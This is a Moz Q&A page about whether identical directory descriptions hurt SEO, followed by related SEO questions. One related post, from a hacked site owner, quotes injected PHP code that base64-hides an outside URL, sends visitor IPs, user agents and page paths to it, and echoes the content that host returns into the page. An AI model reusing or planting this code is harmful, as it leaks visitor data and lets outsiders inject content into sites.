Does same description in the directories of all affect SEO or not? - But unique on the website
-
Hi,
I would like to do some directories. When I checked with a person for his recent work, he has given the same description in 50 directories he has done for a client. Does this affect SEO or not?
-
Hi Anu,
To help us better understand the question, would it be possible to share a video message (have you tried Loom?) to share with us what you're wanting assistance with?
Best,
Zack -
Would you mind providing screen shots or URLs?
-
I'm not sure I understand the question. Are you saying that your have around 50 pages with the same contents? Duplicate contents are not good for SEO: https://moz.com/learn/seo/duplicate-content
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
SEO Links in Footer?
Hi, One of my clients uses a pretty powerful SEO tool, won't mention the name. They now have a "link equity" tool, which they are using on a lot of their client's sites, which include tons of fortune 500 companies. It involves add footer links to your site that change based on the content of the page they are on. The machine learning tries to figure out the most related pages and links to them with the heading tag of that page as the anchor text. Initially this sounds very spammy to me. But then, it seems a lot like "related products" tools that many companies use. The goal for this tool is to build up internal linking, especially for deeper pages on their site. They have over 10,000 currently. What are everyone's thoughts on this strategy?
White Hat / Black Hat SEO | | vetofunk2 -
Infinite Scrolling on Publisher Sites - is VentureBeat's implementation really SEO-friendly?
I've just begun a new project auditing the site of a news publisher. In order to increase pageviews and thus increase advertising revenue, at some point in the past they implemented something so that as many as 5 different articles load per article page. All articles are loaded at the same time and from looking in Google's cache and the errors flagged up in Search Console, Google treats it as one big mass of content, not separate pages. Another thing to note is that when a user scrolls down, the URL does in fact change when you get to the next article. My initial thought was to remove this functionality and just load one article per page. However I happened to notice that VentureBeat.com uses something similar. They use infinite scrolling so that the other articles on the page (in a 'feed' style) only load when a user scrolls to the bottom of the first article. I checked Google's cached versions of the pages and it seems that Google also only reads the first article which seems like an ideal solution. This obviously has the benefit of additionally speeding up loading time of the page too. My question is, is VentureBeat's implementation actually that SEO-friendly or not. VentureBeat have 'sort of' followed Google's guidelines with regards to how to implement infinite scrolling https://webmasters.googleblog.com/2014/02/infinite-scroll-search-friendly.html by using prev and next tags for pagination https://support.google.com/webmasters/answer/1663744?hl=en. However isn't the point of pagination to list multiple pages in a series (i.e. page 2, page 3, page 4 etc.) rather than just other related articles? Here's an example - http://venturebeat.com/2016/11/11/facebooks-cto-explains-social-networks-10-year-mission-global-connectivity-ai-vr/ Would be interesting to know if someone has dealt with this first-hand or just has an opinion. Thanks in advance! Daniel
White Hat / Black Hat SEO | | Daniel_Morgan1 -
Active Rain and SEO
I have been an active rain member for a long time. When I check my web site I can not find any links from Active Rain. I just updated my Active Rain profile and upgraded to their paid subscription. Can you tell me if this blog is creating a follow link back to my web site at www.RealEstatemarketLeaders.com the blog on active rain is here. at http://activerain.trulia.com/blogsview/4529309/hud-homes-for-sale-in-tri-cities-wa
White Hat / Black Hat SEO | | Brandon_Patton0 -
Is horizontal hashtag linking between 4 different information text pages with a canonical tag to the URL with no hashtag, a White Hat SEO practice?
Hey guys, I need help. hope it is a simple question : if I have horizontal 4 text pages which you move between through hashtag links, while staying on the same page in user experience, can I canonical tag the URL free of hashtags as the canonical page URL ? is this white hat acceptable practice? and will this help "Adding the Value", search queries, and therefore rank power to the canonical URL in this case? hoping for your answers. Best Regards, and thanks in advance!
White Hat / Black Hat SEO | | Muhammad_Jabali0 -
Hit by negative SEO
I think my site got hit by a negative SEO campaign. We got nailed by the latest Google update and our traffic dropped significantly. We don't buy links, ask for links, do link exchanges, etc. Since the last update was all about spammy backlinks, I downloaded backlinks from Google Webmaster Tools just to see if there was any info in there. There are tons, hundreds, thousands of backlinks from spammy sites to us. Sites that are spammy as heck and sell backlinks on the footer. I can only assume someone went after us with a negative SEO campaign. We're the #3 site in a hot market. Is the only way to combat this to disavow all those spammy backlinks with the Google disavow tool? We also have a manual penalty on our site as well. I've asked for a reconsideration request and have heard nothing. Please advise.
White Hat / Black Hat SEO | | CFSSEO0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
SEO best practice: Use tags for SEO purpose? To add or not to add to Sitemap?
Hi Moz community, New to the Moz community and hopefully first post/comment of many to come. I am somewhat new to the industry and have a question that I would like to ask and get your opinions on. It is most likely something that is a very simple answer, but here goes: I have a website that is for a local moving company (so small amounts of traffic and very few pages) that was built on Wordpress... I was told when I first started that I should create tags for some of the cities serviced in the area. I did so and tagged the first blog post to each tag. Turned out to be about 12-15 tags, which in turn created 12-15 additional pages. These tags are listed in the footer area of each page. There are less than 20 pages in the website excluding the tags. Now, I know that each of these pages are showing as duplicate content. To me, this just does not seem like best practices to me. For someone quite new to the industry, what would you suggest I do in order to best deal with this situation. Should I even keep the tags? Should I keep and not index? Should I add/remove from site map? Thanks in advance for any help and I look forward to being a long time member of SEOMoz.
White Hat / Black Hat SEO | | BWrightTLM0 -
What do you think are some of the least talked about topics of SEO?
What do you think are some of the least talked about topics of SEO? Do you think these topics need to be given more attention? Why do you think they've been ignored?
White Hat / Black Hat SEO | | TheOceanAgency0